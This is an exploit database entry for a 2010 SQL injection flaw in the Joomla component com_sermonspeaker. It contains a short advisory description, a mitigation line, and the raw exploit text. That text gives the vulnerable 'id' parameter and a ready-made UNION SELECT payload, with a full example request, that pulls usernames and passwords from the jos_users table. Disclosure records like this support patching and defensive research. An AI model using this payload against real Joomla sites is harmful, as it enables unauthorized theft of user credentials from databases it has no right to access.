Joomla Component com_sermonspeaker SQL Injection Vulnerability

vendor:

com_sermonspeaker

by:

SadHaCkEr

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_sermonspeaker

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_sermonspeaker SQL Injection Vulnerability

A vulnerability exists in Joomla Component com_sermonspeaker, which allows an attacker to inject malicious SQL queries via the 'id' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Title:Joomla Component com_sermonspeaker SQL Injection Vulnerability 
# Author: SadHaCkEr
# Data  : 2010-04-12
 
[~]######################################### InformatioN #############################################[~]

#AUTHOR:            SadHaCkEr                                                
#Email:             n5s@hotmail.[choose ANY ONE]   IF U lucky  U will Find Me                             
#Website:           http://www.sadx.297m.com/                                
#Forum :            http://v4-team.net/cc                                    
    
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable  :
  
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]
  
[~] ExploiT         :
  
-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

 
   
[~]######################################### ThankS To ... ############################################[~]
  
[~] Special Thanks 2 :
  
RoMaNcYxHaCkEr, Mr.Safa7, Mn7oS & Sniper Code & Red Virus & HCJ & Mr.Wolf & ayaster & All Trayg Member .
  
[~] Trayg Team + V4-Team + SVT Team 
  
[~] GreetZ 2: My LoV3r + My Keyboard
 
[~]#########################################  ./Done   #############################################[~]